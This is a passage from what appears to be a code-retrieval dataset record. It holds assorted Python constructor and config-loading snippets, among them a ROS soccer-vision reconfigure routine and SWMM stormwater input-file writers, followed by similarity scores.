table-) field mask image be published?\n if ros_utils.config_param_change(self._config, config, 
'vision_publish_field_mask_image'):\n self._publish_field_mask_image = config['vision_publish_field_mask_image']\n if self._publish_field_mask_image:\n rospy.loginfo('(Dynamic color lookup table-) Field mask image publishing is enabled', logger_name=\"dynamic_color_lookup_table\")\n else:\n rospy.loginfo('(Dynamic color lookup table-) Field mask image publishing is disabled', logger_name=\"dynamic_color_lookup_table\")\n\n # Set the white color detector\n if ros_utils.config_param_change(self._config, config, r'^white_color_detector_'):\n if config['white_color_detector_use_color_lookup_table']:\n self._white_color_detector = color.PixelListColorDetector(config, self._package_path, 'white_color_detector_color_lookup_table_path')\n else:\n self._white_color_detector = color.HsvSpaceColorDetector(config, \"white\")\n\n # Set the red color detector\n if ros_utils.config_param_change(self._config, config, r'^red_color_detector_'):\n self._red_color_detector = color.HsvSpaceColorDetector(config, \"red\")\n\n # Set the blue color detector\n if ros_utils.config_param_change(self._config, config, r'^blue_color_detector_'):\n self._blue_color_detector = color.HsvSpaceColorDetector(config, \"blue\")\n\n # Check if params changed\n if ros_utils.config_param_change(self._config, config,\n r'^field_color_detector_|dynamic_color_lookup_table_') and not config['field_color_detector_use_hsv']:\n # Check if the dynamic color lookup table field color detector or the static field color detector should be used\n if config['dynamic_color_lookup_table_active']:\n # Set dynamic color lookup table field color detector\n self._field_color_detector = color.DynamicPixelListColorDetector(\n config,\n self._package_path)\n else:\n # Unregister old subscriber\n if self._sub_dynamic_color_lookup_table_msg_topic is not None:\n # self._sub_dynamic_color_lookup_table_msg_topic.unregister() # Do not use this method, does not work\n self._sub_dynamic_color_lookup_table_msg_topic = None\n # Set the static field color detector\n self._field_color_detector = color.PixelListColorDetector(\n config,\n self._package_path)\n\n # Check if params changed\n if ros_utils.config_param_change(self._config, config,\n r'^field_color_detector_|field_color_detector_use_hsv') and config['field_color_detector_use_hsv']:\n # Unregister old subscriber\n if self._sub_dynamic_color_lookup_table_msg_topic is not None:\n # self._sub_dynamic_color_lookup_table_msg_topic.unregister() # Do not use this method, does not work\n self._sub_dynamic_color_lookup_table_msg_topic = None\n\n # Override field color hsv detector\n self._field_color_detector = color.HsvSpaceColorDetector(config, \"field\")\n # Get field boundary detector class by name from _config\n field_boundary_detector_class = field_boundary.FieldBoundaryDetector.get_by_name(\n config['field_boundary_detector_search_method'])\n\n # Set the field boundary detector\n self._field_boundary_detector = field_boundary_detector_class(\n config,\n self._field_color_detector)\n\n # Set the line detector\n self._line_detector = lines.LineDetector(\n config,\n self._white_color_detector,\n self._field_color_detector,\n self._field_boundary_detector)\n\n # Set the obstacle detector\n self._obstacle_detector = obstacle.ObstacleDetector(\n config,\n self._field_boundary_detector)\n\n # If dummy ball detection is activated, set the dummy ballfinder as ball detector\n if config['neural_network_type'] == 'dummy':\n self._ball_detector = candidate.DummyCandidateFinder()\n # If we don't use YOLO set the 
conventional goalpost detector.\n self._goalpost_detector = obstacle.ColorObstacleDetector(\n self._obstacle_detector,\n self._white_color_detector,\n threshold=config['obstacle_color_threshold'])\n '''\n # Check if the fcnn is activated\n if config['neural_network_type'] == 'fcnn':\n # Check if its the first callback, the fcnn is newly activated or the model has changed\n if ros_utils.config_param_change(self._config, config, ['fcnn_model_path', 'neural_network_type']):\n # Build absolute model path\n ball_fcnn_path = os.path.join(self._package_path, 'models', config['fcnn_model_path'])\n # Check if it exists\n if not os.path.exists(os.path.join(ball_fcnn_path, \"model_final.index\")):\n rospy.logerr('AAAAHHHH! The specified fcnn model file doesn\\'t exist! Maybe its a YOLO model? Look twice.', logger_name=\"vision_fcnn\")\n else:\n self._ball_fcnn = live_fcnn_03.FCNN03(ball_fcnn_path)\n rospy.loginfo(\"FCNN vision is running now\", logger_name=\"vision_fcnn\")\n #Check if ball_fcnn _config or the neural network type has changed\n if ros_utils.config_param_change(self._config, config, r'^ball_fcnn_') or \\\n ros_utils.config_param_change(self._config, config, 'neural_network_type'):\n # Set fcnn handler\n self._ball_detector = fcnn_handler.FcnnHandler(\n config,\n self._ball_fcnn)\n # When using the FCNN, set the conventional goalpost detector.\n self._goalpost_detector = obstacle.ColorObstacleDetector(\n self._obstacle_detector,\n self._white_color_detector,\n threshold=config['obstacle_color_threshold'])\n '''\n # Check if the yolo ball/goalpost detector is activated and if the non tpu version is used\n if config['neural_network_type'] in ['yolo_opencv', 'yolo_darknet']:\n if ros_utils.config_param_change(self._config, config, ['yolo_darknet_model_path', 'neural_network_type']):\n # Build absolute model path\n yolo_darknet_model_path = os.path.join(self._package_path, 'models', config['yolo_darknet_model_path'])\n # Check if it exists\n if not os.path.exists(os.path.join(yolo_darknet_model_path, \"yolo_weights.weights\")):\n rospy.logerr('The specified yolo darknet model file doesn\\'t exist! 
Maybe its a fcnn model?', logger_name=\"vision_yolo\")\n else:\n # Decide which yolo implementation should be used\n if config['neural_network_type'] == 'yolo_opencv':\n # Load OpenCV implementation (uses OpenCL)\n self._yolo = yolo_handler.YoloHandlerOpenCV(config, yolo_darknet_model_path)\n elif config['neural_network_type'] == 'yolo_darknet':\n # Load Darknet implementation (uses CUDA)\n self._yolo = yolo_handler.YoloHandlerDarknet(config, yolo_darknet_model_path)\n rospy.loginfo(config['neural_network_type'] + \" vision is running now\", logger_name=\"vision_yolo\")\n\n # For other changes only modify the config\n elif ros_utils.config_param_change(self._config, config, r'yolo_'):\n self._yolo.set_config(config)\n\n # Set both ball and goalpost detector\n self._ball_detector = yolo_handler.YoloBallDetector(config, self._yolo)\n self._goalpost_detector = yolo_handler.YoloGoalpostDetector(config, self._yolo)\n # Check if we use the yolo robot detection\n if \"robot\" in self._yolo.get_classes():\n self._obstacle_detector = yolo_handler.YoloRobotDetector(config, self._yolo)\n\n # Check if tpu version of yolo ball/goalpost detector is used\n if config['neural_network_type'] in ['yolo_ncs2']:\n if ros_utils.config_param_change(self._config, config, ['neural_network_type', 'yolo_openvino_model_path']):\n # Build absolute model path\n yolo_openvino_model_path = os.path.join(self._package_path, 'models', config['yolo_openvino_model_path'])\n # Check if it exists\n if not os.path.exists(os.path.join(yolo_openvino_model_path, \"yolo.bin\")) \\\n or not os.path.exists(os.path.join(yolo_openvino_model_path, \"yolo.xml\")):\n rospy.logerr('The specified yolo openvino model file doesn\\'t exist! Maybe its a fcnn model?', logger_name=\"vision_yolo\")\n else:\n self._yolo = yolo_handler.YoloHandlerNCS2(config, yolo_openvino_model_path)\n rospy.loginfo(config['neural_network_type'] + \" vision is running now\", logger_name=\"vision_yolo\")\n # For other changes only modify the config\n elif ros_utils.config_param_change(self._config, config, r'yolo_'):\n self._yolo.set_config(config)\n\n # Set both ball and goalpost detector\n self._ball_detector = yolo_handler.YoloBallDetector(config, self._yolo)\n self._goalpost_detector = yolo_handler.YoloGoalpostDetector(config, self._yolo)\n # Check if we use the yolo robot detection\n if \"robot\" in self._yolo.get_classes():\n self._obstacle_detector = yolo_handler.YoloRobotDetector(config, self._yolo)\n\n # Set the other obstacle detectors\n self._red_obstacle_detector = obstacle.ColorObstacleDetector(\n self._obstacle_detector,\n self._red_color_detector,\n threshold=config['obstacle_color_threshold'],\n subtractors=[self._goalpost_detector])\n self._blue_obstacle_detector = obstacle.ColorObstacleDetector(\n self._obstacle_detector,\n self._blue_color_detector,\n threshold=config['obstacle_color_threshold'],\n subtractors=[self._red_obstacle_detector, self._goalpost_detector])\n self._unknown_obstacle_detector = obstacle.ColorObstacleDetector(\n self._obstacle_detector,\n threshold=config['obstacle_color_threshold'],\n subtractors=[self._red_obstacle_detector, self._blue_obstacle_detector, self._goalpost_detector])\n\n self._register_or_update_all_subscribers(config)\n\n # Define Modules that should run their calculations (modules should exist, therefore its located here)\n self._conventional_modules = [\n self._field_color_detector,\n self._white_color_detector,\n self._red_color_detector,\n self._blue_color_detector,\n self._unknown_obstacle_detector,\n 
self._obstacle_detector,\n self._line_detector,\n ]\n\n # Publish Config-message (mainly for the dynamic color lookup table node)\n ros_utils.publish_vision_config(config, self._pub_config)\n\n # The old _config gets replaced with the new _config\n self._config = config", "def __init__(self, doc_format=None, angle=None, width=None, height=None, center=None, left_bottom=None, left_top=None, right_bottom=None, right_top=None, dpi=None, local_vars_configuration=None): # noqa: E501 # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._doc_format = None\n self._angle = None\n self._width = None\n self._height = None\n self._center = None\n self._left_bottom = None\n self._left_top = None\n self._right_bottom = None\n self._right_top = None\n self._dpi = None\n self.discriminator = None\n\n if doc_format is not None:\n self.doc_format = doc_format\n if angle is not None:\n self.angle = angle\n if width is not None:\n self.width = width\n if height is not None:\n self.height = height\n if center is not None:\n self.center = center\n if left_bottom is not None:\n self.left_bottom = left_bottom\n if left_top is not None:\n self.left_top = left_top\n if right_bottom is not None:\n self.right_bottom = right_bottom\n if right_top is not None:\n self.right_top = right_top\n if dpi is not None:\n self.dpi = dpi", "def __init__(self, configFileName):\n config = yaml.load(open(configFileName, \"r\"))\n\n # Logging\n self.log_level = logging.DEBUG\n if config['log_level'] == 'INFO':\n self.log_level = logging.INFO\n if config['log_level'] == 'ERROR':\n self.log_level = logging.ERROR\n\n # CPU count\n self.multipleOfCPUCount = float(config['multiple_of_cpu_count'])\n\n # Sliding window creation:\n slidingWindow = config['sliding_window']\n sw_folders = slidingWindow['folders']\n self.sw_folders_frame = sw_folders['frame_output']\n self.sw_folders_patch = sw_folders['patch_output']\n self.sw_folders_json = sw_folders['json_output']\n self.sw_folders_leveldb = sw_folders['levedb_output']\n self.sw_folders_video = sw_folders['video_output']\n self.sw_folders_numpy = sw_folders['numpy_output']\n\n self.sw_frame_density = int(slidingWindow['frame_density'])\n self.sw_patchWidth = int(slidingWindow['output_width'])\n self.sw_patchHeight = int(slidingWindow['output_height'])\n self.sw_xStride = int(slidingWindow['x_stride'])\n self.sw_yStride = int(slidingWindow['y_stride'])\n \n self.sw_scales = []\n sw_temp_scales = slidingWindow['scaling']\n for sw_scale in sw_temp_scales:\n self.sw_scales = self.sw_scales + [float(sw_scale)]\n\n # Caffe input\n caffeInput = config['caffe_input']\n self.ci_modelFile = caffeInput['model_file']\n self.ci_video_prototxtFile = caffeInput['video_prototxt_file']\n self.ci_deploy_prototxtFile = caffeInput['deploy_prototxt_file']\n self.ci_numFramesPerLeveldb = caffeInput['num_frames_per_leveldb']\n self.ci_numConcurrentLeveldbs = caffeInput['num_concurrent_leveldbs']\n self.ci_maxLeveldbSizeMB = caffeInput['max_leveldb_size_mb']\n self.ci_videoFrameNumberStart = caffeInput['video_frame_number_start']\n self.ci_useGPU = caffeInput['use_gpu'] == True\n self.ci_saveVideoHeatmap = caffeInput['save_video_heatmap'] == True\n self.ci_allClassIds = caffeInput['all_classes']\n self.ci_backgroundClassIds = caffeInput['background_classes']\n self.ci_nonBackgroundClassIds = [x for x in self.ci_allClassIds if x not in self.ci_backgroundClassIds]\n\n # Post processing\n postProcessing = 
config['post_processing']\n self.pp_detectorThreshold = postProcessing['detector_threshold']\n\n # Curation\n curation = config['curation']\n self.cr_curationNumOfSets = curation['num_of_sets']\n self.cr_curationNumOfPatchPerSet = curation['num_of_patch_per_set']\n\n # PeaksExtractor config - not exposed to config.yaml\n # Connectedness of labeled example - have a full matrix structure\n self.pe_binaryStructure = ndimage.morphology.generate_binary_structure(2,2)\n # if the intersection between candidate labeled bbox and proposed subsume bbox\n # is more than 70%, then subsume the candidate labeled bbox\n self.pe_maxCandidateIntersectionDiff = 0.7\n # allow no more than 90% of intersection between subsumed boxes\n self.pe_maxSubsumedIntersectionDiff = 0.9\n # thresholds to subsample candidate labeled bbox prior to showing to user\n self.pe_curationPatchThresholds = [0.98, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1]", "def __init__(self, output_dir, fstype, num_disks, num_dirs):\n super(PostMarkTest, self).__init__(fstype, num_disks)\n self.num_dirs = num_dirs\n self.output_dir = output_dir\n self.configurations = []", "def __init__(self, **kwargs):\n super(MBTilesBuilder, self).__init__(**kwargs)\n self.mbtiles_output = kwargs.get('mbtiles_output', DEFAULT_MBTILES_OUTPUT)\n # Gather tiles for mbutil\n basename, ext = os.path.splitext(os.path.basename(self.mbtiles_output))\n self.tmp_dir = kwargs.get('tmp_dir', DEFAULT_TMP_DIR)\n self.tmp_dir = os.path.join(self.tmp_dir, basename)\n self.tile_format = kwargs.get('tile_format', DEFAULT_TILE_FORMAT)\n # Number of tiles in total\n self.nbtiles = 0\n self._bboxes = []\n self._metadata = []\n self.verbose=False\n self.request_url=\"\"", "def __init__(self, height, width):\n # number of keypoint kind\n self.kpn = 4\n # max output object in one image\n self.maxDet = 20\n # object detect threshold, confidence\n self.obj_thr = 0.5\n # peak detect threshold, unit pixel\n self.peak_thr = 0.5\n # see threshold\n self.see_thr = 0.8\n # peak close threshold, unit pixel\n self.close_thr = 1.0\n self.height = height\n self.width = width\n # assit array\n self.x_array = np.tile(np.arange(self.width), (self.height, 1))\n self.y_array = np.tile(np.arange(self.height).reshape(-1, 1),\n (1, self.width))", "def __init__(self,config,typ='train'):\n\n self._config = config\n self.type = typ\n self.reader = JsonlReader(self._config.annotations.as_dict()[typ])\n self.annotations = self.reader.read()\n self.transform = get_image_processor(self._config.image_processor)", "def __init__(self):\n\n self.write_title = TitleWriter() # TITLE project title\n self.write_options = GeneralWriter() # OPTIONS analysis options\n self.write_report = ReportWriter() # REPORT output reporting instructions\n self.write_files = SectionWriter() # FILES interface file options\n self.write_files.SECTION_NAME = \"[FILES]\"\n self.write_files.section_type = Files\n self.write_backdrop = BackdropOptionsWriter() # BACKDROP bounding rectangle and file name of backdrop image\n self.write_map = MapOptionsWriter() # MAP map's bounding rectangle and units\n self.write_raingages = SectionWriterAsList(\"[RAINGAGES]\", RainGageWriter,\n \";;Name \\tFormat \\tInterval\\tSCF \\tSource \\n\"\n \";;--------------\\t---------\\t--------\\t--------\\t----------\")\n\n self.write_hydrographs = SectionWriterAsList(\"[HYDROGRAPHS]\", UnitHydrographWriter,\n \";;Hydrograph \\tRain Gage/Month \\tResponse\\tR \\tT \\tK \\tDmax \\tDrecov \\tDinit \\n\"\n 
\";;--------------\\t----------------\\t--------\\t--------\\t--------\\t--------\\t--------\\t--------\\t--------\")\n # unit hydrograph data used to construct RDII inflows\n\n self.write_evaporation = EvaporationWriter() # EVAPORATION evaporation data\n self.write_temperature = TemperatureWriter() # TEMPERATURE air temperature and snow melt data\n self.write_adjustments = AdjustmentsWriter() # ADJUSTMENTS monthly climate adjustments\n self.write_subcatchments = SectionWriterAsList(\"[SUBCATCHMENTS]\", SubcatchmentWriter,\n \";;Name \\tRain Gage \\tOutlet \\tArea \\t%Imperv \\tWidth \\t%Slope \\tCurbLen \\tSnowPack \\n\"\n \";;--------------\\t----------------\\t----------------\\t--------\\t--------\\t--------\\t--------\\t--------\\t----------------\")\n # basic subcatchment information\n\n self.write_subareas = SectionWriterAsList(\"[SUBAREAS]\", SubareaWriter,\n \";;Subcatchment \\tN-Imperv \\tN-Perv \\tS-Imperv \\tS-Perv \\tPctZero \\tRouteTo \\tPctRouted\\n\"\n \";;--------------\\t----------\\t------------\\t--------\\t----------\\t----------\\t----------\\t---------\")\n # subcatchment impervious/pervious sub-area data\n\n #self.write_infiltration = SectionWriterAsListOf(\"[INFILTRATION]\", SectionWriter, None)\n # write_infiltration is set in as_text based on the kind of infiltration being used in the project.\n\n self.write_lid_controls = SectionWriterAsList(\"[LID_CONTROLS]\", LIDControlWriter,\n \";;Name \\tType/Layer\\tParameters\\n\"\n \";;--------------\\t----------\\t----------\")\n # low impact development control information\n\n self.write_lid_usage = SectionWriterAsList(\"[LID_USAGE]\", LIDUsageWriter,\n \";;Subcatchment \\tLID Process \\tNumber \\tArea \\tWidth \\tInitSat \\tFromImp \\tToPerv \\tRptFile \\tDrainTo\\n\"\n \";;--------------\\t----------------\\t-------\\t----------\\t----------\\t----------\\t----------\\t----------\\t------------------------\\t----------------\")\n # assignment of LID controls to subcatchments\n\n self.write_aquifers = SectionWriterAsList(\"[AQUIFERS]\", AquiferWriter,\n \";;Aquifer \\tPhi \\tWP \\tFC \\tHydCon\\tKslope\\tTslope\\tUEF \\tLED \\tLGLR \\tBEL \\tWTEL \\tUZM \\tUEF Pat\\n\"\n \";;--------------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t-------\")\n # groundwater aquifer parameters\n\n self.write_groundwater = SectionWriterAsList(\"[GROUNDWATER]\", GroundwaterWriter,\n \";;Subcatchment \\tAquifer \\tNode \\tEsurf \\tA1 \\tB1 \\tA2 \\tB2 \\tA3 \\tDsw \\tEgwt \\tEbot \\tWgr \\tUmc \\n\"\n \";;--------------\\t----------------\\t----------------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\\t------\")\n # subcatchment groundwater parameters\n\n self.write_gwf = SectionWriterAsList(\"[GWF]\", GWFWriter,\n \";;Subcatchment \\tFlow \\tEquation\\n\"\n \";;-------------- \\t------- \\t--------\")\n # custom groundwater flow equations\n\n self.write_snowpacks = SectionWriterAsList(\"[SNOWPACKS]\", SnowPackWriter,\n \";;Name \\tSurface \\tParameters\\n\"\n \";;--------------\\t----------\\t----------\")\n # subcatchment snow pack parameters\n\n self.write_junctions = SectionWriterAsList(\"[JUNCTIONS]\", JunctionWriter,\n \";;Name \\tElevation \\tMaxDepth \\tInitDepth \\tSurDepth \\tAponded\\n\"\n \";;--------------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # junction node information\n\n self.write_outfalls = SectionWriterAsList(\"[OUTFALLS]\", OutfallWriter,\n \";;Name \\tElevation \\tType 
\\tStage Data \\tGated \\tRoute To\\n\"\n \";;--------------\\t----------\\t----------\\t----------------\\t--------\\t----------------\")\n # outfall node information\n\n self.write_dividers = SectionWriterAsList(\"[DIVIDERS]\", DividerWriter,\n \";;Name \\tElevation \\tDiverted Link \\tType \\tParameters\\n\"\n \";;--------------\\t----------\\t----------------\\t----------\\t----------\")\n # flow divider node information\n\n self.write_storage = SectionWriterAsList(\"[STORAGE]\", StorageWriter,\n \";;Name \\tElev. \\tMaxDepth \\tInitDepth \\tShape \\tCurve Name/Params \\tN/A-Pond\\tFevap \\tPsi \\tKsat \\tIMD\\n\"\n \";;--------------\\t--------\\t----------\\t-----------\\t----------\\t----------------------------\\t--------\\t--------\\t--------\\t--------\\t--------\")\n # storage node information\n\n self.write_conduits = SectionWriterAsList(\"[CONDUITS]\", ConduitWriter,\n \";;Name \\tFrom Node \\tTo Node \\tLength \\tRoughness \\tInOffset \\tOutOffset \\tInitFlow \\tMaxFlow\\n\"\n \";;--------------\\t----------------\\t----------------\\t----------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # conduit link information\n\n self.write_pumps = SectionWriterAsList(\"[PUMPS]\", PumpWriter,\n \";;Name \\tFrom Node \\tTo Node \\tPump Curve \\tStatus \\tStartup \\tShutoff\\n\"\n \";;--------------\\t----------------\\t----------------\\t----------------\\t--------\\t--------\\t--------\")\n # pump link information\n\n self.write_orifices = SectionWriterAsList(\"[ORIFICES]\", OrificeWriter,\n \";;Name \\tFrom Node \\tTo Node \\tType \\tOffset \\tQcoeff \\tGated \\tCloseTime\\n\"\n \";;--------------\\t----------------\\t----------------\\t------------\\t----------\\t----------\\t--------\\t----------\")\n # orifice link information\n\n self.write_weirs = SectionWriterAsList(\"[WEIRS]\", WeirWriter,\n \";;Name \\tFrom Node \\tTo Node \\tType \\tCrestHt \\tQcoeff \\tGated \\tEndCon \\tEndCoeff \\tSurcharge \\tRoadWidth \\tRoadSurf \\tCoeff. 
Curve\\n\"\n \";;--------------\\t----------------\\t----------------\\t------------\\t----------\\t----------\\t--------\\t--------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # weir link information\n\n self.write_outlets = SectionWriterAsList(\"[OUTLETS]\", OutletWriter,\n \";;Name \\tFrom Node \\tTo Node \\tOffset \\tType \\tQTable/Qcoeff \\tQexpon \\tGated\\n\"\n \";;--------------\\t----------------\\t----------------\\t----------\\t---------------\\t----------------\\t----------\\t--------\")\n # outlet link information\n\n self.write_xsections = SectionWriterAsList(\"[XSECTIONS]\", CrossSectionWriter,\n \";;Link \\tShape \\tGeom1 \\tGeom2 \\tGeom3 \\tGeom4 \\tBarrels \\tCulvert \\n\"\n \";;--------------\\t------------\\t----------------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # conduit, orifice, and weir cross-section geometry\n\n self.write_transects = TransectsWriter() # transect geometry for conduits with irregular cross-sections\n\n self.write_losses = SectionWriterAsList(\"[LOSSES]\", LossWriter,\n \";;Link \\tKentry \\tKexit \\tKavg \\tFlap Gate \\tSeepage \\n\"\n \";;--------------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # conduit entrance/exit losses and flap valves\n\n self.write_controls = ControlWriter()\n # rules that control pump and regulator operation\n\n self.write_events = SectionWriterAsList(\"[EVENTS]\", EventsWriter,\n \";;Start Date \\tEnd Date\\n\")\n # events\n\n self.write_landuses = SectionWriterAsList(\"[LANDUSES]\", LanduseWriter,\n \";; \\tSweeping \\tFraction \\tLast\\n\"\n \";;Name \\tInterval \\tAvailable \\tSwept\\n\"\n \";;--------------\\t----------\\t----------\\t----------\")\n # land use categories\n\n self.write_buildup = SectionWriterAsList(\"[BUILDUP]\", BuildupWriter,\n \";;Land Use \\tPollutant \\tFunction \\tCoeff1 \\tCoeff2 \\tCoeff3 \\tPer Unit\\n\"\n \";;--------------\\t----------------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # buildup functions for pollutants and land uses\n\n self.write_washoff = SectionWriterAsList(\"[WASHOFF]\", WashoffWriter,\n \";;Land Use \\tPollutant \\tFunction \\tCoeff1 \\tCoeff2 \\tSweepRmvl \\tBmpRmvl\\n\"\n \";;--------------\\t----------------\\t----------\\t----------\\t----------\\t----------\\t----------\")\n # washoff functions for pollutants and land uses\n\n self.write_pollutants = SectionWriterAsList(\"[POLLUTANTS]\", PollutantWriter,\n \";;Name \\tUnits \\tCrain \\tCgw \\tCrdii \\tKdecay \\tSnowOnly \\tCo-Pollutant \\tCo-Frac \\tCdwf \\tCinit\\n\"\n \";;--------------\\t------\\t----------\\t----------\\t----------\\t----------\\t----------\\t----------------\\t----------\\t----------\\t----------\")\n # pollutant information\n\n self.write_coverages = CoveragesWriter() # COVERAGES # assignment of land uses to subcatchments\n self.write_treatment = SectionWriterAsList(\"[TREATMENT]\", TreatmentWriter,\n \";;Node \\tPollutant \\tFunction\\n\"\n \";;--------------\\t----------------\\t--------\")\n # pollutant removal functions at conveyance system nodes\n\n self.write_inflows = SectionWriterAsList(\"[INFLOWS]\", DirectInflowWriter,\n \";;Node \\tConstituent \\tTime Series \\tType \\tMfactor \\tSfactor \\tBaseline\\tPattern\\n\"\n \";;--------------\\t----------------\\t----------------\\t--------\\t--------\\t--------\\t--------\\t--------\")\n # INFLOWS # external hydrograph/pollutograph inflow at nodes\n\n self.write_dwf = SectionWriterAsList(\"[DWF]\", DryWeatherInflowWriter,\n 
\";;Node \\tConstituent \\tBaseline \\tPatterns \\n\"\n \";;--------------\\t----------------\\t----------\\t----------\")\n # baseline dry weather sanitary inflow at nodes\n\n self.write_patterns = SectionWriterAsList(\"[PATTERNS]\", PatternWriter,\n \";;Name \\tType \\tMultipliers\\n\"\n \";;--------------\\t----------\\t-----------\")\n # PATTERNS periodic variation in dry weather inflow\n\n self.write_rdii = SectionWriterAsList(\"[RDII]\", RDIInflowWriter,\n \";;Node \\tUnit Hydrograph \\tSewer Area\\n\"\n \";;--------------\\t----------------\\t----------\")\n # rainfall-dependent I/I information at nodes\n\n self.write_loadings = InitialLoadingsWriter()\n # initial pollutant loads on subcatchments\n\n self.write_curves = SectionWriterAsList(\"[CURVES]\", CurveWriter,\n \";;Name \\tType \\tX-Value \\tY-Value \\n\"\n \";;--------------\\t----------\\t----------\\t----------\")\n # CURVES x-y tabular data referenced in other sections\n\n self.write_timeseries = SectionWriterAsList(\"[TIMESERIES]\", TimeSeriesWriter,\n \";;Name \\tDate \\tTime \\tValue\\n\"\n \";;--------------\\t----------\\t----------\\t----------\")\n # time series data referenced in other sections\n\n self.write_labels = SectionWriterAsList(\"[LABELS]\", LabelWriter,\n \";;X-Coord \\tY-Coord \\tLabel\")\n # X, Y coordinates, text, and font details of labels", "def __init__(self, config):\n super().__init__(config)\n\n # For NaMaster you need to pass the masks\n self.mask_files = self.config[\"tjpcov\"].get(\"mask_file\")\n self.mask_names = self.config[\"tjpcov\"].get(\"mask_names\")\n\n # Binning info is only needed if workspaces are not passed\n self.binning_info = self.config[\"tjpcov\"].get(\"binning_info\", None)\n\n # nside is needed if mask_files is a hdf5 file\n self.nside = self.config[\"tjpcov\"].get(\"nside\", None)\n\n # Read NaMaster specific options\n self.nmt_conf = self.config.get(\"NaMaster\", {})\n for k in [\"f\", \"w\", \"cw\"]:\n if k not in self.nmt_conf:\n self.nmt_conf[k] = {}\n\n # Read cache from input file. 
It will update the cache passed as an\n # argument of the different methods\n self.cache = self.config.get(\"cache\", {})", "def __init__(self,pid,temperatureController,clock,web,oled,feedingAPI,thirdBucketAPI):\n persFile = open(\"persistenceFile.txt\",\"r\") \n persFile.seek(0,0)\n self.values = persFile.readlines() #values = [P,I,D,threshold,maxerrors,errorgap,leveltoFeed]\n defaultP = float(self.values[0][:-2])\n defaultI = float(self.values[1][:-2])\n defaultD = float(self.values[2][:-2])\n defaultThreshold = float(self.values[3][:-2])\n defaultMaxErrors = int(self.values[4][:-2])\n defaultErrorGap = int(self.values[5][:-2])\n algaeLevelToFeed = int(self.values[6][:-2])\n persFile.close()\n \n self.temperatureController = temperatureController\n self.clock = clock\n self.pid = pid\n self.oled = oled\n self.feedingAPI = feedingAPI\n self.thirdBucketAPI = thirdBucketAPI\n self.temperatureController.set_pid_threshold(defaultThreshold)\n self.pid.set_P(defaultP)\n self.pid.set_I(defaultI)\n self.pid.set_D(defaultD)\n self.pid.set_goal(defaultGoal)\n self.pid.set_max_errors(defaultMaxErrors)\n self.pid.set_derivative_error_gap(defaultErrorGap)\n self.clock.add_flag(\"temp\", temperaturePeriod)\n self.clock.add_flag(\"coms1\", comPeriod)\n self.clock.add_flag(\"coms2\", comPeriod,int(comPeriod/2))\n self.clock.add_flag(\"oled\",oledPeriod)\n self.clock.add_flag(\"feedMussels\", feedingMusselsPeriod)\n self.clock.add_flag(\"feedAlgae\", feedingMusselsPeriod,int(feedingMusselsPeriod/2))\n self.clock.add_flag(\"pumpRestart\", pumpRestartPeriod)\n self.clock.add_flag(\"feedThirdBucket\", feedingThirdBucketPeriod)\n self.clock.add_flag(\"ReverseFeedThirdBucket\", feedingThirdBucketPeriod,int(feedingThirdBucketPeriod/2))\n self.feedingMussels = False\n self.sendingBackWater = False\n self.feedingThirdBucket = False\n self.sendingBackThirdBucketWater = False\n self.web = web \n self.previousAlgaeLevel = 0\n self.previousTempLevel = 0\n self.algaeLevelToFeed = algaeLevelToFeed\n self.poolPumpingAmount = poolPumpingAmount", "def init():\n \n # General parameters\n exp_path = '/home/laura/Documents/stacks tif/1705_regMovie.tif' # experimental tif stack (grayscale)\n bin_path = '/home/laura/Documents/stacks tif/1705/1705_binarizedMovie.tif' # binarized tif stack\n vect_path = '/home/laura/Documents/STAGE3/1705_NET/' # gpickle directory\n dest_path = '/home/laura/Documents/STAGE3/1705_NET/superposition' # output directory\n verbose = True\n debug = True\n invert = True \n main_params = [exp_path, bin_path, vect_path, dest_path, verbose, debug, invert]\n \n # Output options\n doImg = -1 # image index\n doStack = False \n doVideo = False \n compress = 3 # advice: no more than 5\n output_params = [doImg, doStack, doVideo, compress]\n \n # Drawing options (colors as BGR)\n line = True # edges drawing\n line_color = (0, 255, 0) # green \n line_size = 1 \n apex_color = (0, 0, 255) # red\n apex_size = 5\n node_color = (255, 0, 0) # blue\n node_size = 5\n body_color = (0, 255, 0) # green\n body_size = 3\n drawing_params = [line, line_color, line_size, apex_color, apex_size,\n node_color, node_size, body_color, body_size]\n \n return main_params, output_params, drawing_params", "def __init__(self, measurement, tags, fields, time_stamp):\n self.measurement = measurement\n self.tags = tags\n self.fields = fields\n self.time = time_stamp" ]
[ "0.5815659", "0.5406954", "0.53990644", "0.53855544", "0.5383662", "0.5338992", "0.5320965", "0.5303831", "0.5302118", "0.5297782", "0.52322584", "0.51910156", "0.51902056", "0.5185881", "0.5184995", "0.5149911", "0.5142809", "0.51350987", "0.51125443", "0.5085775", "0.5084318", "0.5083843", "0.50741166", "0.50733346", "0.5055613", "0.5020785", "0.501958", "0.5002097", "0.5001654", "0.5001007", "0.49937087", "0.49931908", "0.49715212", "0.49715167", "0.49703154", "0.49691698", "0.49682102", "0.4964391", "0.49627817", "0.4948408", "0.49387518", "0.4934652", "0.49333638", "0.49320552", "0.49223527", "0.4922147", "0.4919161", "0.4918922", "0.49082938", "0.48981136", "0.4893451", "0.48897916", "0.48868626", "0.4886587", "0.48854253", "0.48797482", "0.48721954", "0.48660684", "0.4863846", "0.48619848", "0.48556846", "0.4852245", "0.48511815", "0.4847874", "0.4842159", "0.48333865", "0.4824914", "0.4819786", "0.4818314", "0.4810998", "0.48106608", "0.48071736", "0.48060837", "0.48057252", "0.4798714", "0.47960815", "0.47820234", "0.47802177", "0.47799873", "0.47776425", "0.47738954", "0.47738954", "0.47738954", "0.47738954", "0.47738954", "0.47727278", "0.4769976", "0.47663876", "0.47646332", "0.47639558", "0.47590575", "0.47581345", "0.4753262", "0.47491702", "0.47469714", "0.47376508", "0.473677", "0.47332147", "0.47323075", "0.47291434" ]
0.64838976
0
